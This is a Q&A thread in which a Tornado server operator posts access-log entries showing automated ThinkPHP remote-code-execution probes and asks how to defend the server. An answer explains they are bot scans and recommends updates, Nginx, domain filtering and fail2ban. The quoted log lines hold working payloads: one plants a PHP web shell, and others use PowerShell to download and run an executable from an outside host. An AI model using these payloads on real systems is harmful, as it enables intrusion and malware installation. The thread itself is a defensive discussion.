# I need advice on continuous hacking attempts while running Tornado on a Linux (Raspbian) Machine

Tags: python, tornado

I am at my wits-end on this topic and my research has led me nowhere.
I am running a Tornado web server on a Linux OS and I am not having any problems with my Python scripts. What I am having a problem with and need advice on is protecting myself against hackers.

For the past 2 weeks my Tornado server has more or less been writing the following to a Daily errorlog:

> WARNING:tornado.access:404 GET
>   /public/index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/12.exe');start%20C:/12.exe
>   (58.56.76.210) 12.70ms
>
> WARNING:tornado.access:404 GET
>   /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo%20%5E%3C?php%20$action%20=%20$_GET%5B'xcmd'%5D;system($action);?%5E%3E%3Ehydra.php
>   (58.56.76.210) 4.82ms
>
> WARNING:tornado.access:404 GET
>   /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/12.exe');start%20C:/12.exe
>   (58.56.76.210) 3.97ms

The ip address suggests that he is located in China.

I don't understand what is going on other than the hacker must think that he is attacking a "Windows" pc. The web server issues a web page which is used by my clients to access the server. It does me no good to change the port numbers as I must keep the Tornado port open because that is required for my clients' access. Whatever port number I use he will find with a port scanner.

I've installed "fail2ban" and changed the ssh port. i am forcing password access and rsa access for ssh.

My greatest concern is that he will eventually get it right and steal valuable software, data, and personal information.

Please advise on what he is trying to do and what I can do to protect the machine from unwarranted access.

Answer (score 2):

Welcome to the Internet.

This is nothing out of the normal. If you have a server running online, it will get these spam requests. These are requests sent by some bot script that scans the web for vulnerable servers.

Here are some tips to protect your server against these *attacks*:

1. Keep your server up to date.
2. It's a good idea to run Tornado behind Nginx. This is because Nginx people release security updates faster than Tornado.
3. Only respond to requests which try to access your domain name, not to your IP address.
   For example, if someone tries to access `example.com/path`, only respond to that. And return 404 for `IPAddress/path`. This is because most of these bot scripts only know the IP of your server and not the domain. But a regular user will always use your domain to access your website. Another reason to run Tornado behind Nginx.
4. Run `fail2ban` - it will scan Nginx error logs for IP addresses which make bogus requests and ban them for a specified period of time. Read [this introduction](http://www.fail2ban.org/wiki/index.php/MANUAL_0_8#Introduction) about how it works.
5. If your server has SSH access then it is pretty much guaranteed that the bot script is trying to login through SSH with bogus username and passwords. `fail2ban` can help you deal with this, too. Here's a good tutorial on setting up `fail2ban`: [Using fail2ban to secure your server](http://www.fail2ban.org/wiki/index.php/MANUAL_0_8#Introduction).